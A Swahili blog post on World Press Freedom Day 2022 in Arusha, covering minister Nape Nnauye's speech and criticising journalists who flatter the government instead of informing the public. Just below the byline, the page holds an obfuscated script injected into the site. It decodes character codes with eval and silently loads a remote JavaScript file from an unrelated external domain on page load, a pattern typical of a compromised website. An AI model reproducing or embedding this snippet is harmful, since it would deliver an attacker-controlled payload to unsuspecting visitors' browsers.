Recent Comments

Siku ya Uhuru wa Habari, Waandishi wa Habari Kuisaidia Jamii ni Lazima Kuacha Ukasuku

By ventas malack May 3, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Leo ni kilele cha maadhimisho ya siku ya uhuru wa habari duniani ambapo maadhimisho haya hufanyika kila mwaka ifikapo tarehe 3 mei ambapo hii ni kwa lengo la kusherekea hatua iliyofikiwa na vyombo vya habari katika uhuru na demokrasia pia kujadili na kutoa mapendekezo jinsi ya kuboresha zaidi.


Kwa mwaka huu maadhisho haya yanafanyikia hapa nchini katika jiji la Arusha ambapo yamehusisha nchi takribani 10 za bara la Afrika yakiwa na mlengo wa kuisaidia zaidi jamii ya Afrika yaani umma.
Aidha Waziri wa Habari, Mawasiliano na Teknolojia ya Habari Mhe. Nape Nnauye amehutubia siku ya jana na kuwaasa waandishi wa habari kuisaidia jamii ya Afrika kuendana na mabadiliko ya sayansi na Teknolojia ili kuiletea jamii maendeleo makubwa.
Kiongozi huyo ameongeza kuwa kumekuwa na mijadala mingi ikiwemo masuala ya Crypto currencies na malipo ya kielektroniki yanayotumika sana kwa sasa hivyo huu ndo muda wa vyombo vya habari kuliibua jambo hili na kufanya jamii ielewe namna ya kuingia na kulitumia maana ni fursa.
Kiuhalisia waziri wahabari anatambua sana umuhimu wa tasnia hii kwa kuwa ndiyo jicho la taifa lakini shida ipo kwa waandishi wa habari kipindi kingine ni kweli muda mwingine maslahi ya waandishi wa habari wengi huwa ni madogo lakini isiwe chanzo cha kufanya kazi kikasuku.


Waandishi wa habari wengi hasa hapa nchini huendeshwa na ukasuku yaani kuisifia serikali kwa kupitiliza kisa tu uoga wa kuweka jamii sawa, kumekuwa na suala hili la kuupiga mwingi na kipindi cha waliopita walisifiwa inapunguza kuaminika kwa jamii yetu na hata inapunguza utendaji bora maana tafsiri ya ukasuku ni uoga hivo kuibua mambo ni ngumu sana.


Kuna haja ya waandishi wa habari kujitathmini na kujua jinsi ya kuitibu jamii na kuondosha ukasuku licha ya kwamba baadhi ya sheria si rafiki lakini pia vyombo vya habari huwa haviko vyema maana husifia mno na siyo kushauri,kupongeza na hata kukosea, ikifanyika hivi tutaona faida ya uhuru wa habari.

By ventas malack

Make the World Aware